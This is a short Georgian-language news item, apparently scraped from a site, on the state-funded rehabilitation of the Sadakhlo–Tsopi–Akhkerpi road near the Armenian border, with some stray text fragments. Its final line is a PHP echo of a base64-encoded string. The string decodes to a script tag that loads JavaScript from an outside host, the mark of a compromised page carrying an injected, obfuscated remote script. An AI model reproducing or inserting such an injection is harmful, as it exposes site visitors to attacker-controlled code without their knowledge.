celsiusi
ავერსი შნაიდერი

 შიდასახელმწიფოებრივი მნიშვნელობის სადახლო-წოფი-ახქერფის საავტომობილო გზის 8.6 კმ-იანი მონაკვეთის სარეაბილიტაციო სამუშაოები აქტიურად გრძელდება.

სარეაბილიტაციო მონაკვეთი მარნეულის მუნიციპალიტეტის ტერიტორიაზე მდებარეობს და სომხეთის რესპუბლიკის საზღვრამდე მიდის.
პროექტი ითვალისწინებს გზის სრულ რეაბილიტაციას, რომლის ფარგლებშიც მიმდინარეობს გზის სავალი ნაწილისა და 1 ხიდის რეაბილიტაცია, არსებული ხელოვნური ნაგებობების აღდგენა და ახალი ნაგებობების მოწყობა.
 
ასევე, გათვალისიწინებულია მიერთებების, წყალგამტარი მილების, მოსახლეობის ეზოებში შესასვლელების, ავტოსადგომის, ავტოპავილიონების, საგზაო ნიშნების მოწყობა და გზის სავალი ნაწილის მონიშვნა .
 
პროექტი სახელმწიფო ბიუჯეტიდან ფინანსდება და მისი ღირებულება 6 655 986 ლარია. სამუშაოების დასრულება წლის ბოლომდე იგეგმება.
 
ინფორმაციას გზების დეპარტამენტი ავრცელებს. 
586
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");